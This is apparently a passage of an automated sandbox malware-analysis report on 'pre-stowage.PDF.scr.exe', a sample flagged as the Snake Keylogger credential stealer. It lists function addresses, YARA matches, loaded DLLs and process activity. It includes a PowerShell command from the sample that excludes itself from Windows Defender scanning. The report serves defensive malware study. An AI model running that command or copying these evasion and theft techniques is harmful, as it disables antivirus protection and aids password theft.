                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07958B28
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07957271
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795E7D0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795E7E0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07957708
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795AE18
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795AE08
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795DDE3
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07956521
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795654D
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795AC10
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795AC01
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795F408
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795EB90
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795E3D8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07958ACA
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07959A08
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795B279
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_07955A60
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_079599F9
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795B099
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795E098
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795B0A8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_0795E0A8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A0040
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A79B0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A9BB0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A7140
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A91B0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A0006
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A7578
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A05E0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 0_2_094A05F0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFC147
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFD278
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF5362
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFC468
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFC738
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF69A0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFE988
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFCA08
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFCCD8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF9DE0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF6FC8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFCFA9
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EFE97A
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Code function: 4_2_00EF3E09
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1331309353.00000000094B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004021000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1328346964.0000000007863000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1328346964.0000000007863000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1327810612.00000000077F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000000.1285805465.0000000000C20000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDjCW.exe: vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1312395806.00000000011CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1319452030.0000000003297000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3762586006.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe | Binary or memory string: OriginalFilenameDjCW.exe: vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: pre-stowage.PDF.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UfFTqgYtsb6KTX3coT.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UfFTqgYtsb6KTX3coT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UfFTqgYtsb6KTX3coT.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UfFTqgYtsb6KTX3coT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UfFTqgYtsb6KTX3coT.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UfFTqgYtsb6KTX3coT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2644:120:WilError_03
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stlwkqko.czw.ps1
                Source: pre-stowage.PDF.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: pre-stowage.PDF.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: pre-stowage.PDF.scr.exe | ReversingLabs: Detection: 28%
                Source: pre-stowage.PDF.scr.exe | Virustotal: Detection: 30%
                Source: unknown | Process created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Process created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
